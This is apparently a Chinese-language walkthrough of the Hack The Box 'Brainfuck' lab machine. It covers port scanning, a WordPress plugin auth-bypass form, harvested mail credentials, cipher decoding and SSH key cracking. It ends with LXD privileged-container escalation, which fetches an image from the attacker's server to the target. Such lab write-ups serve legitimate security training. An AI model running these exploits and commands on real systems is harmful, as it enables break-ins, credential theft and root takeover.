靶场类型
信息收集
Nmap
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sS -sV -A -sC -p- --min-rate 10000 10.10.10.17
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-19 01:49 CST
Nmap scan report for 10.10.10.17
Host is up (0.41s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94d0b334e9a537c5acb980df2a54a5f0 (RSA)
| 256 6bd5dc153a667af419915d7385b24cb2 (ECDSA)
|_ 256 23f5a333339d76d5f2ea6971e34e8e02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) USER TOP AUTH-RESP-CODE CAPA RESP-CODES PIPELINING UIDL
143/tcp open imap Dovecot imapd
|_imap-capabilities: SASL-IR ENABLE LITERAL+ LOGIN-REFERRALS more listed ID capabilities have post-login Pre-login AUTH=PLAINA0001 IMAP4rev1 OK IDLE
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.0 (Ubuntu)
| tls-nextprotoneg:
|_ http/1.1
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 482.21 ms 10.10.16.1
2 482.26 ms 10.10.10.17
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.32 seconds
DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
这边又两个域名,先加入 hosts 解析吧
echo 10.10.10.17 brainfuck.htb www.brainfuck.htb sup3rs3cr3t.brainfuck.htb >> /etc/hosts
Http
直接访问是 Nginx 默认页面
使用 hosts 解析后访问是一个 wordpress 页面,版本是 4.7.3
这里的内容是 SMTP 集成已准备就绪吗,然后给了我们一个邮件地址,让我们检查后把反馈发送到这个地址
[email protected]
SMTP 使用的端口是 25 端口,这里先记录一下,说不定有用
既然知道是 wordpress 了,那就用 wpscan 去扫描一下
Wpscan
┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url "https://brainfuck.htb/" --disable-tls-checks
_______________________________________________________________
__ _______ _____
/ / __ / ____|
/ / /| |__) | (___ ___ __ _ _ __ ®
/ / / | ___/ ___ / __|/ _` | '_
/ / | | ____) | (__| (_| | | | |
/ / |_| |_____/ ___|__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Thu Jan 19 02:01:26 2023
Interesting Finding(s):
[+] wp-support-plus-responsive-ticket-system
| Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Last Updated: 2019-09-03T07:57:00.000Z
| [!] The version is out of date, the latest version is 9.1.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 7.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
发现一个老版本插件
https://www.exploit-db.com/exploits/41006
搜索这个插件找到了一个可利用的漏洞
漏洞利用
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="admin">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
将我们的 poc 保存到本地,然后使用 python3 开启一个 http 服务
python3 -m http.server 80
选择登录试试
点击后是一片空白页面,不确定是否利用成功,返回主页看看
ok,这里我们利用成功了,已经成功登录
在 Settings -> Easy WP SMTP 中,可以看到 SMTP 的信息,这里密码是隐藏的
使用控制台就可以看到密码
SMTP
Email = [email protected]
username = orestis
password = kHGuERB29DNiNE
┌──(root㉿kali)-[~/Desktop]
└─# nc 10.10.10.17 110
+OK Dovecot ready.
USER orestis
+OK
PASS kHGuERB29DNiNE
+OK Logged in.
list
+OK 2 messages:
1 977
2 514
.
retr 1
+OK 977 octets
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by brainfuck (Postfix, from userid 33)
id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: [email protected]
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <[email protected]>
Message-ID: <[email protected]>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Your new WordPress site has been successfully set up at:
https://brainfuck.htb
You can log in to the administrator account with the following information:
Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php
We hope you enjoy your new site. Thanks!
--The WordPress Team
https://wordpress.org/
.
retr 2
+OK 514 octets
Return-Path: <[email protected]>
X-Original-To: orestis
Delivered-To: [email protected]
Received: by brainfuck (Postfix, from userid 0)
id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: [email protected]
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: [email protected] (root)
Hi there, your credentials for our "secret" forum are below :)
username: orestis
password: kIEnnfEKJ#9UmdO
Regards
.
得到了两封邮件
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by brainfuck (Postfix, from userid 33)
id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: [email protected]
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <[email protected]>
Message-ID: <[email protected]>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Your new WordPress site has been successfully set up at:
https://brainfuck.htb
You can log in to the administrator account with the following information:
Username: admin
Password: The password you chose during the install.
Log in here: https://brainfuck.htb/wp-login.php
We hope you enjoy your new site. Thanks!
--The WordPress Team
https://wordpress.org/
Return-Path: <[email protected]>
X-Original-To: orestis
Delivered-To: [email protected]
Received: by brainfuck (Postfix, from userid 0)
id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: [email protected]
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: [email protected] (root)
Hi there, your credentials for our "secret" forum are below :)
username: orestis
password: kIEnnfEKJ#9UmdO
Regards
得到了一个账号密码
username: orestis
password: kIEnnfEKJ#9UmdO
sup3rs3cr3t.brainfuck.htb
我们看一下另一个地址是什么东西
似乎是一个论坛
用我们刚才的账号密码去登录试试
成功登录
这里的对话有点意思,就是有个人骂管理员,赶快把密钥发给我。管理员说,你个小碧池,我看你一点礼貌都没有,信不信我把密钥贴在这里给大家下载。然后那个人说他开了一个新的加密通话的帖子
密码解密
我们可以看到,对话已经被加密了,然后我找了一个解密的网站
https://planetcalc.com/2468/
brainfu - ckmybra inf uck myb rainfu
然后我们先删除所有的特殊字符
brainfuckmybrainfuckmybrainfu
我们去尝试解密,可以确定的是
mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sja
这一段肯定是一个网址,所以我们看看这一段密码怎么解密才能让它变成网址
fuckmybrain
https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
最后得出了密钥和地址
私钥解密
┌──(root㉿kali)-[~/Desktop]
└─# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6904FEF19397786F75BE2D7762AE7382
mneag/YCY8AB+OLdrgtyKqnrdTHwmpWGTNW9pfhHsNz8CfGdAxgchUaHeoTj/rh/
B2nS4+9CYBK8IR3Vt5Fo7PoWBCjAAwWYlx+cK0w1DXqa3A+BLlsSI0Kws9jea6Gi
W1ma/V7WoJJ+V4JNI7ufThQyOEUO76PlYNRM9UEF8MANQmJK37Md9Ezu53wJpUqZ
7dKcg6AM/o9VhOlpiX7SINT9dRKaKevOjopRbyEFMliP01H7ZlahWPdRRmfCXSmQ
zxH9I2lGIQTtRRA3rFktLpNedNPuZQCSswUec7eVVt2mc2Zv9PM9lCTJuRSzzVum
oz3XEnhaGmP1jmMoVBWiD+2RrnL6wnz9kssV+tgCV0mD97WS+1ydWEPeCph06Mem
dLR2L1uvBGJev8i9hP3thp1owvM8HgidyfMC2vOBvXbcAA3bDKvR4jsz2obf5AF+
Fvt6pmMuix8hbipP112Us54yTv/hyC+M5g1hWUuj5y4xovgr0LLfI2pGe+Fv5lXT
mcznc1ZqDY5lrlmWzTvsW7h7rm9LKgEiHn9gGgqiOlRKn5FUl+DlfaAMHWiYUKYs
LSMVvDI6w88gZb102KD2k4NV0P6OdXICJAMEa1mSOk/LS/mLO4e0N3wEX+NtgVbq
ul9guSlobasIX5DkAcY+ER3j+/YefpyEnYs+/tfTT1oM+BR3TVSlJcOrvNmrIy59
krKVtulxAejVQzxImWOUDYC947TXu9BAsh0MLoKtpIRL3Hcbu+vi9L5nn5LkhO/V
gdMyOyATor7Amu2xb93OO55XKkB1liw2rlWg6sBpXM1WUgoMQW50Keo6O0jzeGfA
VwmM72XbaugmhKW25q/46/yL4VMKuDyHL5Hc+Ov5v3bQ908p+Urf04dpvj9SjBzn
schqozogcC1UfJcCm6cl+967GFBa3rD5YDp3x2xyIV9SQdwGvH0ZIcp0dKKkMVZt
UX8hTqv1ROR4Ck8G1zM6Wc4QqH6DUqGi3tr7nYwy7wx1JJ6WRhpyWdL+su8f96Kn
F7gwZLtVP87d8R3uAERZnxFO9MuOZU2+PEnDXdSCSMv3qX9FvPYY3OPKbsxiAy+M
wZezLNip80XmcVJwGUYsdn+iB/UPMddX12J30YUbtw/R34TQiRFUhWLTFrmOaLab
Iql5L+0JEbeZ9O56DaXFqP3gXhMx8xBKUQax2exoTreoxCI57axBQBqThEg/HTCy
IQPmHW36mxtc+IlMDExdLHWD7mnNuIdShiAR6bXYYSM3E725fzLE1MFu45VkHDiF
mxy9EVQ+v49kg4yFwUNPPbsOppKc7gJWpS1Y/i+rDKg8ZNV3TIb5TAqIqQRgZqpP
CvfPRpmLURQnvly89XX97JGJRSGJhbACqUMZnfwFpxZ8aPsVwsoXRyuub43a7GtF
9DiyCbhGuF2zYcmKjR5EOOT7HsgqQIcAOMIW55q2FJpqH1+PU8eIfFzkhUY0qoGS
EBFkZuCPyujYOTyvQZewyd+ax73HOI7ZHoy8CxDkjSbIXyALyAa7Ip3agdtOPnmi
6hD+jxvbpxFg8igdtZlh9PsfIgkNZK8RqnPymAPCyvRm8c7vZFH4SwQgD5FXTwGQ
-----END RSA PRIVATE KEY-----
然后我们得到了私钥,但是似乎是加密的,我们还不能直接使用
┌──(root㉿kali)-[~/Desktop]
└─# ssh2john id_rsa > id_rsa_decode
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_decode
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia! (id_rsa)
1g 0:00:00:03 DONE (2023-01-19 15:20) 0.3095g/s 3857Kp/s 3857Kc/s 3857KC/s 3prash0..3pornuthin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
得到了私钥的密码
3poulakia!
┌──(root㉿kali)-[~/Desktop]
└─# ssh [email protected] -i id_rsa
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
You have mail.
Last login: Mon Oct 3 19:41:38 2022 from 10.10.14.23
orestis@brainfuck:~$ id&&whoami
orestis@brainfuck:~$ whoami&&id
orestis
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)
成功得到 user 权限
orestis@brainfuck:~$ cat user.txt
2c11cfbc5b959f73ac15a3310bd097c9
成功得到 user 权限的 flag 文件
权限提升
通过上面的 id 我们可以看到,当前用户在 lxd 权限组中
https://www.exploit-db.com/exploits/46978
通过搜索 lxd 找到了一个 exploit
Step 1
┌──(root㉿kali)-[~/Desktop]
└─# wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
--2023-01-19 15:28:34-- https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
正在解析主机 raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8003::154, 2606:50c0:8000::154, 2606:50c0:8002::154, ...
正在连接 raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:8060 (7.9K) [text/plain]
正在保存至: “build-alpine”
build-alpine 100%[=====================================================================================================================>] 7.87K --.-KB/s 用时 0s
2023-01-19 15:28:35 (27.1 MB/s) - 已保存 “build-alpine” [8060/8060])
首先下载 build-alpine
Step 2
接着运行
┌──(root㉿kali)-[~/Desktop]
└─# ./build-alpine
Determining the latest release... v3.17
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.17/main/x86_64
Downloading alpine-keys-2.4-r1.apk
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
Downloading apk-tools-static-2.12.10-r1.apk
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
tar: 忽略未知的扩展头关键字‘APK-TOOLS.checksum.SHA1’
[email protected]: 成功
Verified OK
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2527 100 2527 0 0 740 0 0:00:03 0:00:03 --:--:-- 741
--2023-01-19 15:38:57-- http://alpine.mirror.wearetriple.com/MIRRORS.txt
正在解析主机 alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)... 2a00:1f00:dc06:10::106, 93.187.10.106
正在连接 alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)|2a00:1f00:dc06:10::106|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:2527 (2.5K) [text/plain]
正在保存至: “/root/Desktop/rootfs/usr/share/alpine-mirrors/MIRRORS.txt”
/root/Desktop/rootfs/usr/share/alpine-mirrors/MIRROR 100%[=====================================================================================================================>] 2.47K --.-KB/s 用时 0s
2023-01-19 15:39:00 (77.3 MB/s) - 已保存 “/root/Desktop/rootfs/usr/share/alpine-mirrors/MIRRORS.txt” [2527/2527])
Selecting mirror http://mirror.clarkson.edu/alpine//v3.17/main
fetch http://mirror.clarkson.edu/alpine//v3.17/main/x86_64/APKINDEX.tar.gz
(1/25) Installing alpine-baselayout-data (3.4.0-r0)
(2/25) Installing musl (1.2.3-r4)
(3/25) Installing busybox (1.35.0-r29)
Executing busybox-1.35.0-r29.post-install
(4/25) Installing busybox-binsh (1.35.0-r29)
(5/25) Installing alpine-baselayout (3.4.0-r0)
Executing alpine-baselayout-3.4.0-r0.pre-install
Executing alpine-baselayout-3.4.0-r0.post-install
(6/25) Installing ifupdown-ng (0.12.1-r1)
(7/25) Installing libcap2 (2.66-r0)
(8/25) Installing openrc (0.45.2-r7)
Executing openrc-0.45.2-r7.post-install
(9/25) Installing mdev-conf (4.3-r0)
(10/25) Installing busybox-mdev-openrc (1.35.0-r29)
(11/25) Installing alpine-conf (3.15.0-r0)
(12/25) Installing alpine-keys (2.4-r1)
(13/25) Installing alpine-release (3.17.1-r0)
(14/25) Installing ca-certificates-bundle (20220614-r4)
(15/25) Installing libcrypto3 (3.0.7-r2)
(16/25) Installing libssl3 (3.0.7-r2)
(17/25) Installing ssl_client (1.35.0-r29)
(18/25) Installing zlib (1.2.13-r0)
(19/25) Installing apk-tools (2.12.10-r1)
(20/25) Installing busybox-openrc (1.35.0-r29)
(21/25) Installing busybox-suid (1.35.0-r29)
(22/25) Installing scanelf (1.3.5-r1)
(23/25) Installing musl-utils (1.2.3-r4)
(24/25) Installing libc-utils (0.7.2-r3)
(25/25) Installing alpine-base (3.17.1-r0)
Executing busybox-1.35.0-r29.trigger
OK: 10 MiB in 25 packages
┌──(root㉿kali)-[~/Desktop]
└─# ls
alpine-v3.17-x86_64-20230119_1539.tar.gz
多了一个压缩文件
Step 3
使用 python3 开启一个 http 服务
python3 -m http.server 80
Step 4
在靶机中使用 wget 下载,然后运行
orestis@brainfuck:~$ wget http://10.10.16.11/alpine-v3.17-x86_64-20230119_1539.tar.gz
--2023-01-19 09:41:24-- http://10.10.16.11/alpine-v3.17-x86_64-20230119_1539.tar.gz
Connecting to 10.10.16.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3792999 (3.6M) [application/gzip]
Saving to: ‘alpine-v3.17-x86_64-20230119_1539.tar.gz’
alpine-v3.17-x86_64-20230119_1539.tar.gz 100%[=====================================================================================================================>] 3.62M 810KB/s in 11s
2023-01-19 09:41:37 (328 KB/s) - ‘alpine-v3.17-x86_64-20230119_1539.tar.gz’ saved [3792999/3792999]
orestis@brainfuck:~$ lxc image import alpine-v3.17-x86_64-20230119_1539.tar.gz --alias test
Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04
Image imported with fingerprint: 2f15d7d049eb4ce507a0ec903b690f37e78c2166c9d6fd062dbfed81b3816467
orestis@brainfuck:~$ lxc image list
+-------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+-------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| test | 2f15d7d049eb | no | alpine v3.17 (20230119_15:39) | x86_64 | 3.62MB | Jan 19, 2023 at 7:43am (UTC) |
+-------+--------------+--------+-------------------------------+--------+--------+------------------------------+
已经运行成功了,咱们去继续利用
lxc init test test -c security.privileged=true # 初始化镜像
lxc config device add test test disk source=/ path=/mnt/root recursive=true # 挂载磁盘
lxc start test # 启动镜像
lxc exec test /bin/sh # 进入镜像
orestis@brainfuck:~$ lxc exec test /bin/sh
~ # whoami&&id
root
uid=0(root) gid=0(root)
成功拿到 root 权限
~ # cat /mnt/root/root/root.txt
6efc1a5dbb8904751ce6566a305bb8ef
成功拿到 root 权限的 flag 文件
原文始发于微信公众号(路西菲尔的故事汇):Hackthebox - Brainfuck 靶场实战
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论